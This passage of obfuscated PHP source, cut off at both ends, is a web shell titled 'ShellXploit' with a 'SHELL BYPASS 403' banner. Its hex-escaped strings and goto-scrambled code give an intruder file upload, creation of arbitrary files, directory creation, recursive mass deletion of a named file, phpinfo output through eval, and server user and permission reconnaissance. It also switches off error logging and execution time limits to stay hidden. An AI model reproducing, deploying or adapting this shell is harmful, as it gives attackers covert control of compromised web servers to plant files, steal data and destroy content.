"\x27\40\160\x6c\141\143\x65\x68\x6f\154\x64\145\x72\x3d\47\167\x68\157\x61\155\151\47\40{$_r}\x3e\xa\x9\x9\x3c\x62\165\x74\164\157\x6e\40\143\x6c\x61\x73\163\x3d\47\142\164\x6e\x20\142\164\156\x2d\x6f\165\x74\x6c\x69\x6e\145\55\154\151\x67\150\x74\x20\x62\x74\156\55\x73\155\x27\40\164\x79\160\x65\75\x27\x73\165\155\142\151\x74\x27\x3e\x3c\151\40\143\x6c\141\163\163\x3d\47\142\151\40\x62\151\55\x61\x72\162\x6f\167\x2d\162\145\x74\x75\x72\x6e\55\162\151\147\x68\x74\x27\76\74\57\151\x3e\x3c\x2f\x62\165\164\x74\157\156\x3e\12\11\x3c\57\144\151\166\x3e\12\x3c\57\x66\157\162\155\x3e"; if ($cmd) { echo "\12\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\x6e\164\x61\x69\156\145\x72\55\146\154\165\151\x64\40\x6c\x61\156\147\165\141\147\x65\55\152\141\166\x61\x73\x63\x72\151\x70\x74\42\x3e\12\11\x3c\x64\151\x76\40\143\x6c\x61\163\x73\75\42\x73\x68\145\x6c\x6c\x20\155\x62\55\63\x22\x3e\xa\x9\11\x3c\x70\x72\145\40\x73\x74\x79\x6c\145\75\x22\146\157\156\164\x2d\x73\151\x7a\145\x3a\x31\x30\160\x78\x3b\x22\76\74\x63\157\x64\x65\76" . htmlspecialchars($cmd, ENT_QUOTES, "\x55\124\106\55\70") . "\74\57\143\157\144\145\x3e\74\x2f\x70\x72\145\76\12\x9\x3c\x2f\144\151\x76\76\12\74\57\x64\x69\x76\76"; } elseif (!$cmd && $_SERVER["\122\105\x51\x55\105\123\124\x5f\115\x45\x54\x48\117\104"] == "\x50\117\123\x54") { echo "\x3c\x73\x74\x72\x6f\156\x67\x3e\116\157\x20\162\145\163\165\154\164\163\56\74\57\x73\x74\162\157\156\147\x3e\x20\x3c\x64\x69\166\x20\143\154\x61\163\163\75\x22\x62\x6b\x70\x20\x74\x61\142\154\145\55\162\x65\x73\160\x6f\156\163\x69\x76\145\42\x3e" . ini_get("\144\x69\x73\x61\142\154\145\x5f\146\165\156\143\164\x69\157\156\163") . "\74\x2f\x64\x69\166\x3e\40" . er() . "\74\57\x64\151\166\x3e"; } echo "\xa\x3c\57\144\x69\x76\x3e"; } if (isset($_GET["\x70\150\160\151\156\x66\157"])) { @ob_start(); @eval("\160\150\x70\151\156\x66\157\50\x29\73"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff, "\74\x62\157\x64\171\x3e") + 6; $akhir = strpos($buff, "\x3c\57\x62\157\x64\171\x3e"); echo "\x3c\x62\x3e\x3c\x70\162\145\40\x63\x6c\141\x73\163\x3d\x27\x70\150\x70\x5f\151\156\146\x6f\40\x61\156\165\x27\76" . substr($buff, $awal, $akhir - $awal) . "\x3c\57\160\x72\145\76\x3c\57\142\x3e"; die; } if (isset($_GET["\x75\x70\x6c\157\141\144"])) { echo "{$_s}"; if (isset($_POST["\165\x70\x6c"])) { $hasil = count($_FILES["\146\x69\x6c\x65"]["\x6e\x61\155\145"]); for ($isi = 0; $isi < $hasil; $isi++) { $namafile = $_FILES["\146\x69\154\x65"]["\156\x61\x6d\145"][$isi]; $up = @copy($_FILES["\x66\151\154\145"]["\x74\x6d\x70\137\156\x61\x6d\x65"][$isi], "{$path}\x2f" . $namafile); } if ($hasil < 2) { if ($up) { echo "\74\163\164\x72\157\x6e\147\76\x55\x70\154\x6f\x61\x64\x3c\57\x73\164\162\157\156\x67\76\x20{$namafile}\x20\x6f\x6b\41\40" . ok() . "\74\57\x64\151\x76\76"; } else { echo "\x3c\163\164\162\x6f\x6e\x67\x3e\x55\x70\154\x6f\141\144\74\57\163\x74\162\x6f\x6e\x67\x3e\40\147\x61\147\x61\x6c\x21\40" . er() . "\x3c\57\144\151\x76\76"; } } else { echo "\74\x73\164\162\x6f\x6e\147\76\125\x70\154\157\x61\144\74\57\163\x74\162\x6f\x6e\147\76\x20{$hasil}\x20\x6f\153\41\x20" . ok() . "\x3c\x2f\144\151\166\x3e"; } } echo "\xa\x3c\x64\x69\166\40\143\x6c\141\163\x73\x3d\47\x6d\142\55\x33\x27\x3e\12\x9\x3c\x66\157\x72\155\x20\x6d\145\164\150\157\x64\75\47\x50\x4f\123\x54\47\40\x65\x6e\x63\164\171\x70\145\75\47\155\165\x6c\164\x69\160\141\162\x74\x2f\146\x6f\x72\155\x2d\x64\141\164\x61\x27\x3e\12\11\x9\x3c\144\151\x76\40\x63\154\141\x73\x73\75\47\151\x6e\160\x75\x74\x2d\147\x72\x6f\x75\160\40\x6d\x62\x2d\x33\x27\76\xa\11\x9\11\74\x69\x6e\x70\x75\164\40\x63\x6c\x61\163\163\x3d\47\146\x6f\x72\155\x2d\143\x6f\156\x74\x72\x6f\x6c\x20\x66\157\x72\x6d\55\x63\x6f\x6e\x74\162\157\x6c\55\163\155\x27\40\164\171\160\x65\75\47\x66\x69\154\x65\x27\40\156\x61\x6d\145\x3d\47\x66\x69\x6c\x65\133\x5d\x27\x20\x6d\165\x6c\164\x69\160\154\145\x3d\x27\x27\x20{$_r}\76\xa\x9\11\11\74\151\156\x70\x75\x74\x20\143\x6c\141\x73\163\75\47\142\x74\x6e\40\142\164\x6e\x2d\157\165\x74\x6c\x69\x6e\145\x2d\x6c\x69\x67\x68\164\40\x62\x74\x6e\x2d\163\x6d\x27\40\164\x79\x70\145\x3d\x27\x73\x75\x62\155\x69\x74\47\x20\156\x61\x6d\x65\75\x27\165\160\154\x27\40\x76\x61\154\165\x65\x3d\x27\165\x70\154\x6f\x61\144\47\x3e\12\x9\x9\x3c\x2f\x64\x69\166\x3e\12\11\74\x2f\x66\157\x72\155\76\xa\x3c\57\x64\x69\x76\76"; } if (isset($_GET["\146\x69\x6c\x65\x62\141\162\165"])) { echo "{$_s}"; if (isset($_POST["\142\151\x6b\151\156"])) { $name = $_POST["\156\141\x6d\141\x5f\x66\x69\x6c\x65"]; $isi_file = $_POST["\151\x73\151\137\146\x69\x6c\145"]; foreach ($name as $nama_file) { $handle = @fopen("{$nama_file}", "\167"); if ($isi_file) { $buat = @fwrite($handle, $isi_file); } else { $buat = $handle; } } if ($buat) { echo "\x3c\x73\x63\x72\x69\160\164\76\x77\x69\156\144\157\x77\x2e\x6c\x6f\143\141\x74\151\157\x6e\x3d\47\x3f\x70\x61\164\150\75{$path}\x27\x3c\x2f\x73\143\162\x69\x70\164\76"; } else { echo "\x3c\x73\164\x72\x6f\156\x67\76\102\165\x61\x74\x20\x66\151\154\145\x3c\x2f\163\x74\x72\x6f\x6e\147\76\x20\x67\x61\147\x61\154\x21\40" . er() . "\74\57\x64\x69\166\76"; } } echo "\12\x3c\x64\151\166\x20\143\154\x61\163\163\x3d\47\x6d\142\55\x33\47\76\xa\x9\74\146\x6f\162\x6d\40\x6d\x65\164\x68\x6f\x64\x3d\47\120\x4f\x53\x54\47\x3e\xa\11\x9\74\x69\x20\143\154\141\163\x73\x3d\x27\142\x69\40\142\151\x2d\146\x69\154\x65\55\x65\x61\162\x6d\141\x72\153\47\x3e\x3c\x2f\151\x3e\40\116\141\155\141\40\146\x69\x6c\145\72\12\x9\x9\x3c\151\x6e\x70\x75\164\x20\x63\x6c\141\x73\x73\75\x27\x66\157\x72\x6d\55\x63\157\x6e\x74\x72\x6f\154\x20\146\157\x72\155\x2d\x63\x6f\156\x74\x72\157\154\x2d\x73\155\x27\x20\164\171\x70\x65\x3d\47\164\145\170\164\47\x20\156\x61\155\x65\75\47\156\x61\x6d\141\137\146\151\154\145\133\135\x27\40\x70\x6c\141\x63\x65\150\x6f\154\144\145\x72\75\x27\x4e\141\x6d\141\x20\146\x69\154\x65\x27\40{$_r}\76\xa\11\x9\x3c\151\40\143\x6c\x61\x73\163\x3d\x27\142\x69\40\x62\151\55\146\151\x6c\145\55\x65\x61\x72\x6d\141\162\x6b\x27\x3e\74\x2f\x69\76\40\111\163\151\40\x66\151\154\x65\x3a\12\x9\x9\x3c\x74\145\170\x74\x61\x72\x65\141\x20\x63\154\x61\x73\163\x3d\47\x66\157\x72\155\55\143\157\x6e\164\x72\157\154\40\146\157\x72\155\x2d\x63\157\x6e\164\x72\157\x6c\x2d\163\x6d\x27\x20\156\141\155\x65\x3d\47\x69\163\151\x5f\146\151\x6c\x65\47\40\162\x6f\167\x73\x3d\47\x37\x27\x20\160\154\141\143\145\x68\x6f\154\x64\145\162\x3d\47\x49\163\151\x20\146\151\x6c\145\47\x20{$_r}\40\76\x3c\57\x74\x65\170\x74\x61\162\145\x61\76\12\11\x9\x3c\151\x6e\x70\x75\164\x20\143\x6c\141\163\x73\75\x27\142\x74\156\40\x62\x74\156\x2d\x6f\165\164\x6c\151\x6e\x65\55\x6c\151\147\x68\164\x20\142\164\156\55\163\155\x20\x62\164\156\55\x62\154\157\x63\153\47\x20\x74\x79\160\145\75\x27\x73\165\x62\x6d\x69\164\47\x20\x6e\x61\x6d\145\75\47\x62\151\x6b\151\x6e\47\x20\x76\141\154\x75\145\x3d\x27\x62\x75\x61\164\47\x3e\12\x9\74\57\146\x6f\x72\x6d\76\xa\74\x2f\x64\x69\x76\x3e"; } if (isset($_GET["\x64\x69\162\142\141\x72\165"])) { echo "{$_s}"; if (isset($_POST["\142\165\x61\x74"])) { $nama = $_POST["\156\x61\x6d\141\137\144\x69\x72"]; foreach ($nama as $nama_dir) { $folder = preg_replace("\50\x5b\x5e\134\167\x5c\x73\134\x64\134\55\x5f\x7e\x2c\x3b\x3a\134\x5b\x5c\135\134\x28\134\x5d\x2e\135\x7c\x5b\134\x2e\135\x7b\x32\x2c\175\51", '', $nama_dir); $fd = @mkdir($folder); } if ($fd) { echo "\74\163\143\162\x69\x70\164\x3e\167\151\156\144\x6f\167\x2e\154\157\x63\x61\x74\x69\x6f\156\x3d\x27\x3f\x70\x61\x74\150\75{$path}\47\74\57\163\x63\x72\151\x70\164\x3e"; } else { echo "\74\x73\164\162\x6f\x6e\147\76\x42\165\x61\x74\x20\144\x69\162\x3c\x2f\163\x74\x72\x6f\x6e\x67\x3e\x20\x67\141\147\141\154\x21\x20" . er() . "\74\57\144\x69\166\x3e"; } } echo "\12\x3c\x64\x69\x76\x20\143\154\141\x73\x73\x3d\x27\x6d\x62\55\63\x27\x3e\xa\x9\74\x66\157\x72\155\x20\155\145\164\150\x6f\x64\x3d\47\120\x4f\123\124\x27\76\12\x9\x9\x3c\x69\40\143\154\141\x73\x73\75\47\142\151\x20\142\151\55\x66\157\x6c\144\x65\x72\x27\x3e\x3c\57\151\76\x20\116\x61\155\x61\x20\144\x69\x72\72\xa\11\x9\x3c\x64\x69\166\x20\143\154\x61\163\163\x3d\x27\x69\156\x70\165\x74\x2d\147\x72\x6f\x75\x70\x20\155\142\55\63\x27\x3e\xa\11\11\11\x3c\151\x6e\160\165\x74\x20\143\154\x61\163\x73\75\x27\x66\157\162\155\x2d\x63\x6f\156\164\x72\x6f\x6c\40\x66\x6f\162\x6d\x2d\143\157\x6e\164\162\157\154\x2d\163\155\x27\x20\164\x79\x70\x65\x3d\47\x74\x65\170\164\47\x20\x6e\141\x6d\x65\75\x27\156\x61\x6d\x61\x5f\x64\151\162\133\135\x27\40\x70\154\x61\x63\x65\150\x6f\x6c\x64\x65\162\x3d\47\116\x61\x6d\141\40\x64\x69\x72\x27\x20{$_r}\76\xa\x9\x9\x9\x3c\x69\x6e\160\165\164\40\x63\x6c\x61\x73\x73\75\47\142\x74\x6e\x20\x62\164\x6e\x2d\x6f\165\x74\x6c\151\156\x65\x2d\154\x69\147\x68\x74\x20\x62\x74\x6e\55\x73\x6d\47\x20\x74\x79\x70\145\75\x27\x73\165\x62\155\151\x74\x27\x20\x6e\x61\x6d\x65\x3d\x27\142\x75\141\164\47\x20\166\141\x6c\x75\x65\75\47\142\165\141\x74\x27\x3e\12\x9\11\x3c\x2f\x64\x69\x76\x3e\xa\11\x3c\x2f\x66\x6f\x72\155\x3e\12\x3c\57\144\x69\166\76"; } if (isset($_GET["\155\141\163\x73\x5f\x64\x65\x6c\x65\x74\145"])) { echo "{$_s}"; function hapusMassal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $pe = $dirc . "\57" . $namafile; if ($dirb === "\56") { if (file_exists("{$dir}\x2f{$namafile}")) { unlink("{$dir}\57{$namafile}"); } } elseif ($dirb === "\x2e\56") { if (file_exists('' . dirname($dir) . "\x2f{$namafile}")) { unlink('' . dirname($dir) . "\x2f{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($pe)) { echo "\x5b\74\147\162\76\x3c\x69\x20\x63\x6c\141\x73\163\x3d\47\x62\x69\40\x62\x69\x2d\143\150\145\x63\153\x2d\141\154\x6c\x27\x3e\74\57\x69\x3e\x3c\x2f\147\x72\76\x5d\46\x6e\142\x73\160\73{$pe}\x3c\142\162\76"; unlink($pe); $pathPattern = hapusMassal($dirc, $namafile); } } } } } } } if ($_POST["\163\x74\141\x72\x74"]) { hapusMassal($_POST["\144\137\144\151\x72"], $_POST["\x64\137\146\x69\154\145"]); echo "\74\142\x72\76"; } echo "\xa\74\144\151\x76\x20\x63\154\141\x73\163\x3d\47\155\x62\x2d\x33\47\76\xa\11\74\x66\x6f\x72\155\40\x6d\145\x74\x68\x6f\144\75\47\120\117\123\x54\47\x3e\xa\x9\11\x3c\151\40\143\x6c\141\163\163\75\x27\x62\x69\x20\x62\x69\55\x66\x6f\x6c\144\x65\162\x27\76\74\57\151\76\40\x4c\x6f\x6b\x61\163\x69\72\xa\11\11\x3c\151\156\x70\165\x74\40\143\154\141\x73\x73\x3d\47\146\x6f\x72\155\55\143\x6f\x6e\x74\162\x6f\154\x20\x62\x74\156\55\163\155\x27\x20\x74\x79\x70\x65\75\47\x74\x65\x78\164\47\40\x6e\x61\x6d\x65\75\47\144\x5f\144\151\x72\47\x20\166\141\154\x75\x65\75\x27{$dir}\x27\76\12\x9\x9\11\74\x69\40\143\x6c\141\x73\x73\x3d\47\x62\151\40\x62\151\x2d\x66\x69\154\145\55\145\x61\162\x6d\x61\162\x6b\47\76\x3c\57\151\76\x20\x4e\141\x6d\141\x20\146\151\154\145\72\xa\11\x9\74\144\151\166\x20\143\x6c\141\x73\x73\x3d\x27\x69\x6e\160\x75\164\x2d\147\x72\x6f\165\x70\40\x6d\x62\55\x33\x27\x3e\12\11\11\11\x3c\x69\x6e\160\165\x74\40\143\x6c\x61\x73\x73\75\47\x66\157\x72\155\55\x63\157\x6e\x74\x72\x6f\x6c\x20\142\164\x6e\x2d\163\x6d\x27\40\164\x79\160\x65\x3d\47\164\145\x78\164\47\x20\x6e\x61\155\145\x3d\47\144\137\146\151\x6c\145\47\x20\x70\x6c\x61\x63\145\x68\157\x6c\x64\x65\x72\75\47\x6e\141\x6d\x61\40\x66\x69\x6c\x65\x27\40{$_r}\x3e\74\142\x72\76\12\11\x9\x3c\x64\151\166\40\x63\x6c\141\163\x73\75\x27\151\156\160\x75\x74\x2d\147\x72\157\165\160\x2d\141\x70\160\145\156\x64\x27\x3e\12\x9\x9\x9\x3c\151\x6e\x70\x75\x74\x20\143\x6c\x61\x73\x73\x3d\47\x62\164\156\40\142\164\156\55\157\165\164\154\151\156\x65\x2d\x6c\151\147\150\x74\x20\142\x74\x6e\55\x73\155\x27\x20\164\171\x70\x65\x3d\x27\x73\x75\142\155\x69\x74\x27\x20\x6e\141\155\x65\x3d\47\x73\x74\141\162\164\47\x20\166\x61\154\x75\x65\75\x27\x6d\x61\x73\163\x20\x64\145\154\145\x74\145\x27\x3e\xa\x9\x9\x3c\57\x64\x69\x76\76\xa\11\74\57\146\157\x72\155\x3e\12\x3c\57\144\x69\x76\x3e"; } } goto pvdiH; beCRq: $scdir = explode("\x2f", $dir); goto vlR1j; LEvck: $message = "\x4c\151\x6e\x65\40\61\15\xa\x4c\151\156\145\40\62\15\12\x4c\151\156\145\x20\63"; goto xroUB; nxs80: $disfunc = @ini_get("\x64\x69\x73\x61\142\154\145\137\146\165\x6e\143\164\151\x6f\156\163"); goto gwYvW; Bvxky: echo "\xa\x3c\41\x44\117\103\x54\131\120\105\x20\110\x54\x4d\x4c\x3e\xa\x3c\150\164\155\x6c\x3e\12\11\x3c\150\x65\141\144\x3e\12\x9\11\74\155\x65\164\x61\40\x6e\141\155\145\x3d\x27\x61\165\164\x68\157\162\x27\143\157\x6e\164\145\156\164\75\47{$_n}\47\76\12\11\x9\x3c\155\145\x74\x61\40\x6e\141\155\145\x3d\47\x72\157\142\157\164\163\47\x20\143\x6f\x6e\164\x65\156\164\75\47\x6e\157\151\x6e\144\145\x78\x2c\40\156\x6f\x66\x6f\154\154\157\167\47\x20\x2f\76\xa\11\x9\74\164\151\x74\x6c\x65\76" . $_SERVER["\110\x54\124\x50\x5f\x48\117\123\x54"] . "\x20\x2d\40{$_n}\40\x53\x68\x65\154\154\130\160\154\157\151\164\74\57\x74\x69\x74\x6c\x65\x3e\12\x9\11\74\155\145\164\141\40\x6e\141\x6d\145\x3d\x27\166\151\145\x77\160\157\162\164\x27\40\x63\x6f\x6e\x74\145\156\x74\x3d\x27\x77\151\144\164\150\75\144\x65\x76\x69\143\145\x2d\167\151\x64\x74\x68\x2c\40\x69\x6e\x69\164\151\x61\x6c\55\163\143\x61\x6c\145\x3d\60\x2e\x37\x30\47\x3e\12\11\11\74\x6c\x69\156\x6b\40\x68\x72\x65\x66\x3d\47\150\x74\164\x70\x73\72\57\57\x63\x64\156\56\152\163\144\145\x6c\x69\x76\x72\x2e\x6e\145\164\57\x6e\x70\x6d\x2f\x62\157\x6f\x74\x73\x74\162\141\x70\100\65\x2e\x32\56\x33\57\x64\151\x73\x74\57\x63\x73\x73\57\x62\157\x6f\x74\x73\164\162\141\160\x2e\155\151\156\x2e\x63\x73\163\x27\x20\x72\145\x6c\75\x27\x73\x74\x79\154\145\x73\x68\x65\145\x74\47\76\xa\11\11\x3c\x6c\151\156\153\x20\x72\145\x6c\75\x27\163\164\171\154\145\163\x68\145\x65\164\47\x20\x68\x72\145\x66\75\x27\x68\x74\164\160\x73\x3a\x2f\x2f\x63\144\x6e\x2e\x6a\163\x64\x65\x6c\x69\x76\x72\56\156\x65\164\57\x6e\160\155\x2f\142\157\x6f\x74\163\x74\162\141\160\55\151\143\x6f\156\163\100\61\56\x31\60\56\62\57\x66\157\156\x74\57\x62\x6f\157\164\163\x74\x72\x61\160\x2d\x69\x63\157\x6e\163\56\143\163\x73\47\76\12\11\x3c\57\150\x65\x61\144\x3e\12\x3c\142\x6f\144\171\40\x63\154\x61\x73\x73\x3d\47\x74\145\170\164\x2d\154\x69\147\150\x74\x27\x3e\12\x3c\x64\x69\x76\40\143\154\141\163\x73\x3d\x27\x63\157\x6e\164\141\x69\x6e\x65\162\x2d\146\154\165\x69\144\x27\x3e\12\11\x3c\144\x69\x76\40\x63\154\x61\163\x73\x3d\47\160\171\55\x33\47\x20\x69\x64\x3d\x27\x6d\x61\x69\156\x27\x3e\xa\11\x9\74\x64\x69\166\x20\143\x6c\141\163\163\75\x27\x62\157\170\x20\163\x68\141\x64\157\x77\x20\142\x67\x2d\x64\x61\x72\x6b\x20\x70\x2d\x34\x20\162\157\x75\156\144\145\x64\x2d\63\x27\x3e\12\x9\11\11\x3c\144\151\x76\x20\143\154\x61\x73\x73\x3d\47\143\x6f\162\156\x65\x72\40\164\145\170\164\55\x73\x65\x63\157\156\x64\141\162\171\x20\x61\156\x75\x20\167\167\x27\76\12\11\x9\11\x9\123\110\105\x4c\114\x20\x42\x59\120\101\x53\123\40\x34\60\x33\x20\x7c\40\xa\11\11\x9\x9\x3c\x64\x69\x76\40\x63\154\141\x73\x73\75\47\x74\167\47\76\12\x9\x9\11\11\x9\74\163\160\141\x6e\x3e\xa\x9\11\x9\x9\x9\11\74\x73\x70\141\156\76\x4d\157\x64\x65\162\156\40\x55\111\x2e\74\x2f\x73\160\141\x6e\x3e\xa\x9\11\x9\11\11\11\74\x73\x70\x61\x6e\x3e\122\145\163\x70\157\x6e\163\x69\x76\x65\x2e\74\x2f\x73\x70\141\156\x3e\12\x9\x9\x9\x9\x9\11\x3c\163\x70\141\x6e\x3e\120\157\x77\145\x72\x66\x75\x6c\x2e\74\57\163\x70\x61\x6e\x3e\xa\11\x9\11\x9\11\74\57\x73\160\x61\x6e\76\12\11\x9\x9\x9\x3c\57\144\151\166\76\12\x9\11\x9\74\57\x64\x69\166\76\12\x9\11\11\x9\74\141\40\x63\154\141\x73\x73\x3d\47\x74\x65\170\164\x2d\144\145\143\157\x72\141\x74\151\x6f\156\x2d\x6e\157\156\x65\x20\x74\x65\170\x74\x2d\154\151\x67\x68\x74\40\x61\156\165\x27\x20\150\x72\x65\x66\x3d\47" . $_SERVER["\x50\x48\120\137\x53\105\x4c\x46"] . "\x27\76\x3c\x68\64\x3e{$_n}\x20\123\x68\145\154\x6c\x3c\x2f\x68\64\76\x3c\x2f\x61\76"; goto ICBvw; obLyu: function ip() { $ipas = ''; if (getenv("\110\x54\x54\120\x5f\x43\x4c\111\x45\116\x54\x5f\111\x50")) { $ipas = getenv("\x48\124\124\x50\137\x43\x4c\x49\x45\x4e\124\x5f\x49\x50"); } else { if (getenv("\110\x54\124\x50\137\x58\137\x46\x4f\122\127\101\122\104\x45\x44\x5f\106\x4f\x52")) { $ipas = getenv("\x48\124\124\x50\137\x58\137\106\117\x52\127\101\122\x44\x45\x44\137\106\117\x52"); } else { if (getenv("\x48\x54\124\120\137\130\x5f\106\x4f\122\x57\x41\x52\104\105\104")) { $ipas = getenv("\x48\x54\x54\x50\x5f\x58\x5f\106\117\122\x57\x41\x52\104\105\104"); } else { if (getenv("\110\x54\x54\120\x5f\x46\x4f\122\127\x41\x52\104\x45\x44\x5f\x46\x4f\122")) { $ipas = getenv("\x48\124\x54\x50\137\106\x4f\x52\x57\101\x52\104\105\x44\137\x46\117\122"); } else { if (getenv("\110\x54\124\x50\x5f\106\x4f\x52\x57\101\122\x44\105\104")) { $ipas = getenv("\110\124\124\x50\137\x46\117\x52\127\101\x52\104\x45\104"); } else { if (getenv("\x52\x45\x4d\117\124\105\x5f\101\x44\x44\x52")) { $ipas = getenv("\x52\x45\115\x4f\x54\105\x5f\x41\x44\x44\x52"); } else { $ipas = "\x49\120\40\x74\151\x64\x61\x6b\40\144\x69\153\145\156\x61\154\151"; } } } } } } return $ipas; } goto F9t1M; dSrN9: if (!function_exists("\x70\157\x73\x69\x78\137\x67\x65\164\x65\147\151\x64")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\x3f"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\156\141\155\x65"]; $uid = $uid["\x75\x69\144"]; $group = $gid["\156\x61\x6d\x65"]; $gid = $gid["\147\x69\x64"]; } goto VILMp; ehEHm: $_x = "\x3c\x69\x20\x63\154\141\163\x73\x3d\47\142\x69\x20\142\151\x2d\x6d\145\x6e\165\x2d\165\160\47\x3e\x3c\x2f\151\x3e"; goto LEvck; OZEgT: $path = str_replace("\134", "\57", $path); goto jQ6Vd; gwYvW: if (empty($disfunc)) { $disfc = "\x3c\x67\162\76\116\117\x4e\105\x3c\57\147\162\x3e"; } else { $disfc = "\74\162\144\x3e{$disfunc}\x3c\57\162\x64\x3e"; } goto dSrN9; xroUB: $message = wordwrap($message, 70, "\xd\12"); goto LMVda; vQfFG: function sz($byt) { $sz = array("\x42", "\113\x42", "\x4d\x42", "\x47\102", "\124\102"); for ($i = 0; $byt >= 1024 && $i < count($sz) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . "\x20" . $sz[$i]; } goto obLyu; X_gAQ: @ini_set("\x6c\x6f\147\137\x65\x72\x72\157\162\163", 0); goto EnLK0; QRuLl: @ini_set("\157\165\x74\x70\x75\164\x5f\x62\165\x66\x66\145\162\x69\156\147", 0); goto zAXfG; UOtCq: echo "\40\133\40" . pathPattern($path, p($path)) . "\40\x5d\74\x2f\144\x69\166\x3e"; goto ChsgR; Q8f_k: $_n = "\x46\x61\151\172\x7a\172\55\x43\x68\x69\x6e"; goto wSj3j; VILMp: $sm = @ini_get(strtolower("\x73\x61\x66\145\137\x6d\x6f\x64\145")) == "\x6f\156" ? "\x3c\x72\144\76\x4f\116\74\57\x72\144\76" : "\x3c\147\162\76\x4f\106\x46\74\57\147\162\76"; goto Bvxky; lcXzh: @ini_set("\145\x72\x72\157\162\137\x6c\x6f\147", null); goto X_gAQ; k7S49: set_time_limit(0); goto nsELO; F9t1M: function p($file) { if ($p = @fileperms($file)) { $i = "\x75"; if (($p & 49152) == 49152) { $i = "\163"; } elseif (($p & 40960) == 40960) { $i = "\154"; } elseif (($p & 32768) == 32768) { $i = "\x2d"; } elseif (($p & 24576) == 24576) { $i = "\x62"; } elseif (($p & 16384) == 16384) { $i = "\144"; } elseif (($p & 8192) == 8192) { $i = "\x63"; } elseif (($p & 4096) == 4096) { $i = "\x70"; } $i .= $p & 256 ? "\162" : "\55"; $i .= $p & 128 ? "\x77" : "\55"; $i .= $p & 64 ? "\x78" : "\x2d"; $i .= $p & 32 ? "\x72" : "\x2d"; $i .= $p & 16 ? "\167" : "\55"; $i .= $p & 8 ? "\170" : "\55"; $i .= $p & 4 ? "\x72" : "\55"; $i .= $p & 2 ? "\x77" : "\x2d"; $i .= $p & 1 ? "\x78" : "\x2d"; return $i; } else { return "\55\x20\x3f\77\x20\55"; } } goto nxs80; wSj3j: $_s = "\74\163\x74\x79\x6c\145\x3e\164\x61\142\x6c\145\x7b\x64\x69\x73\160\x6c\x61\x79\72\156\157\x6e\145\73\175\x3c\57\x73\x74\171\154\x65\76\x3c\x64\x69\x76\x20\143\x6c\141\x73\163\75\x27\x62\x6b\160\40\x74\x61\x62\x6c\x65\x2d\x72\x65\x73\160\x6f\156\163\x69\166\x65\47\76\x3c\x68\162\x3e\74\x2f\144\151\x76\x3e"; goto ImCHb; JMbsx: if (isset($_GET["\160\141\164\150"])) { $dir = $_GET["\x70\141\164\x68"]; chdir($dir); } else { $dir = getcwd(); } goto MxYjB; nsELO: error_reporting(0); goto lcXzh; jQ6Vd: $paths = explode("\x2f", $path); goto YCgKn; ImCHb: $_r = "\x72\145\x71\165\x69\162\145\x64\75\47\x72\x65\x71\x75\151\x72\145\144\x27"; goto ehEHm; RF46d: function er() { echo "\74\x64\151\x76\40\143\154\141\163\x73\x3d\x22\x61\x6c\145\x72\164\40\141\x6c\145\162\x74\x2d\x64\141\156\x67\145\162\40\141\154\145\x72\164\55\x64\151\x73\x6d\x69\x73\163\151\142\154\x65\40\x66\x61\x64\x65\x20\163\x68\x6f\x77\40\155\x79\x2d\63\x22\40\162\157\x6c\145\x3d\42\141\154\145\162\164\x22\x3e\x3c\142\165\x74\x74\x6f\156\x20\164\x79\x70\145\75\42\142\165\164\164\157\156\42\x20\143\154\x61\163\x73\75\42\142\164\x6e\x2d\x63\x6c\x6f\163\145\42\40\144\141\164\x61\55\x62\x73\55\x64\x69\x73\x6d\151\163\x73\75\42\x61\x6c\145\162\x74\42\40\141\x72\x69\141\55\154\x61\142\x65\x6c\x3d\x22\x43\154\x6f\163\145\x22\x3e\74\x2f\142\165\x74\164\x6f\x6e\76"; } goto vQfFG; EnLK0: @ini_set("\155\141\x78\x5f\145\170\x65\x63\x75\164\x69\157\156\x5f\164\151\155\x65", 0); goto QRuLl; MxYjB: $dir = str_replace("\x5c", "\x2f", $dir); goto beCRq; YCgKn: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\144\x69\166\x20\143\154\x61\163\163\x3d\42\142\153\x70\40\x74\141\x62\154\145\55\162\145\163\x70\x6f\156\x73\x69\166\x65\42\76\74\151\x20\x63\154\141\163\x73\x3d\42\x62\x69\x20\x62\151\x2d\x68\144\144\x2d\x72\141\143\153\42\x3e\x3c\57\151\76\40\x3a\40\74\141\x20\143\x6c\x61\x73\163\75\x22\x74\145\x78\x74\x2d\144\x65\143\x6f\x72\141\x74\x69\157\156\x2d\x6e\x6f\156\x65\40\164\145\170\164\55\154\x69\147\x68\x74\x22\x20\150\162\145\146\75\42\77\x70\x61\164\x68\x3d\x2f\42\x3e\x2f\x3c\57\x61\x3e"; continue; } if ($pat == '') { continue; } echo "\74\x61\40\x63\154\141\163\x73\x3d\x22\164\x65\170\x74\x2d\144\145\x63\x6f\x72\141\164\151\157\156\55\156\x6f\x6e\x65\x22\x20\x68\162\x65\146\x3d\42\77\x70\x61\x74\150\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\57"; } } echo "\x22\76" . $pat . "\74\x2f\141\76\x2f"; } goto UOtCq; ChsgR: echo 